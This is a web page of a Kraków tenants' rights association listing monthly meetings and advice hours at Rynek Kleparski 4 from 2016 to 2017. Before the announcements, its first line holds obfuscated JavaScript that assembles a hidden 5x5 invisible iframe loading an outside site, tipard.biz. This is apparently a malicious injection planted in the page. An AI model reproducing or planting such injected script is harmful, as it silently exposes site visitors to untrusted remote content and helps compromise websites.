jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); KOMUNIKATY

Zapraszamy na kolejne zebranie Lokatorów, które odbędzie się
w dniu 17 lutego 2017 r. o godz. 18.00 do siedziby Rady Dzielnicy I,
Rynek Kleparski 4, II piętro. 

Informujemy, że w miesiącu lutym 2017 r. dyżury lokatorskie zostały wyznaczone na 6 lutego oraz 20 lutego w godzinach od 15.00 do 16.00. Zapraszamy lokatorów potrzebujących porady i pomocy do siedziby Rady Dzielnicy I, Rynek Kleparski 4, II piętro.
 
Serdecznie zapraszamy!
 
 
W  styczniu odbędą sie dwa dyżury członków naszego Stowarzyszenia, na które zapraszamy Lokatorów potrzebująvcych informacji i pomocy
 
- 16 stycznia 2017. od  godz. 15 do 16
- 30 stycznia 2017  od  godz. 15 do 16
 
Zapraszamy do siedziby Rady Dzielnicy I przy Rynku Kleparskim 4 (budynek dawnego LOT-u), II piętro

Zapraszamy na kolejne comiesięczne zebranie Stowarzyszenia, które odbędzie się w dniu 20 stycznia 2017 r. (piątek) o godzinie 18,00 w siedzibie Rady Dzielny I, Rynek Kleparski 4

Zapraszamy na kolejne comiesięczne zebranie Stowarzyszenia, które odbędzie się w dniu 16 grudnia 2016 r. (piątek) o godzinie 18,00 w siedzibie Rady Dzielny I, Rynek Kleparski 4

Zapraszamy na kolejne comiesięczne zebranie Stowarzyszenia, które odbędzie się w dniu 18 listopada 2016 r. (piątek) o godzinie 18,00 w siedzibie Rady Dzielny I, Rynek Kleparski 4

Zapraszamy na kolejne comiesięczne zebranie Stowarzyszenia, które odbędzie się w dniu 21 października 2016 r. (piątek) o godzinie 18,00 w siedzibie Rady Dzielnicy I, Rynek Kleparski 4

Wrześniowe spotkanie lokatorów  odbędzie się 16 września o godz. 18.00 w siedzibie Rady I Dzielnicy, Rynek Kleparski 4, II piętro domofon 52

Czerwcowe zebranie lokatorów odbędzie się 17 czerwca 2016 o godz. 18.00 w siedzibie Rady I Dzielnicy , II piętro, domofon 52 - Rynek Kleparski 4 [koło Biura LOT]

Zebranie odbędzie się 20 maja o godz. 18-tej w sali  Rady I Dzielnicy Rynek Kleparski 4 [koło LOT], II piętro  domofon 52

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.